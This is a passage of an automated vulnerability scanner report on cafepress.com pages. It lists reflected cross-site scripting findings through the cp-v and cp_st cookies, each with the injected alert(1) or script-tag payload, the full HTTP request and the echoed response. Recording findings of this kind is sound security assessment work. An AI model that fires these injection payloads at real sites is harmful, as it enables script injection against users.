2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.61. http://www.cafepress.com/+steins [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+steins

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddbad</script><script>alert(1)</script>e5bee7f619b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ddbad</script><script>alert(1)</script>e5bee7f619b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 58719
Date: Sun, 26 Dec 2010 13:47:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/
Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'ddbad</script><script>alert(1)</script>e5bee7f619b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.62. http://www.cafepress.com/+stocking [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+stocking

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77a9a"-alert(1)-"6b71a0eba86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 59606
Date: Sun, 26 Dec 2010 13:49:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.63. http://www.cafepress.com/+stocking [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+stocking

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3b0</script><script>alert(1)</script>6a078ca5ef1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cd3b0</script><script>alert(1)</script>6a078ca5ef1; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59633
Date: Sun, 26 Dec 2010 13:49:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+sweatshirts-hoodies

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9849b"-alert(1)-"0b830c7e51f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 60350
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+sweatshirts-hoodies

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19caf</script><script>alert(1)</script>e4e8e544a2a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=19caf</script><script>alert(1)</script>e4e8e544a2a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 60367
Date: Sun, 26 Dec 2010 13:46:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '19caf</script><script>alert(1)</script>e4e8e544a2a'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.66. http://www.cafepress.com/+thermos [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+thermos

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 179e4"-alert(1)-"9112d7547c6 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 